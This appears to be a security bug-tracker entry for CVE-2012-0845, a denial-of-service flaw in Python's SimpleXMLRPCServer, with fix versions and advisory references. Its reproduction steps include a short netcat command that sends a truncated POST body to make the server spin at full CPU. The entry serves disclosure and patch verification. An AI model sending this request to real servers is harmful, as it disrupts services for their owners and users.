A denial of service flaw was found in the way Simple XML-RPC Server module of Python processed client connections, that were closed prior the complete request body has been received. A remote attacker could use this flaw to cause Python Simple XML-RPC based server process to consume excessive amount of CPU. Credit: Issue reported by Daniel Callaghan References: [1] https://bugzilla.redhat.com/show_bug.cgi?id=789790 Steps to reproduce: ------------------ A) for v3.2.2 version: 1) start server: cat s.py #!/usr/local/bin/python3 from xmlrpc.server import SimpleXMLRPCServer server = SimpleXMLRPCServer(('127.0.0.1', 12345)) server.serve_forever() 2) # top 3) issue request from client: echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345 Return to 'top' screen and see, how CPU consumption on particular host quickly moves to 100%. B) for v2.7.2 version: 1) start server: cat s.py #!/usr/bin/python from SimpleXMLRPCServer import SimpleXMLRPCServer server = SimpleXMLRPCServer(('127.0.0.1', 12345)) server.serve_forever() Steps 2) and 3) for v2.7.2 version are identical to those for v3.2.2 version.
Issue fixed by the stabilization in bug 396329. http://www.python.org/download/releases/2.6.8/ http://www.python.org/download/releases/2.7.3/ http://www.python.org/download/releases/3.1.5/ http://www.python.org/download/releases/3.2.3/ Adding to existing GLSA.
CVE-2012-0845 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0845): SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an XML-RPC POST request that contains a smaller amount of data than specified by the Content-Length header.
This issue was resolved and addressed in GLSA 201401-04 at http://security.gentoo.org/glsa/glsa-201401-04.xml by GLSA coordinator Sergey Popov (pinkbyte).
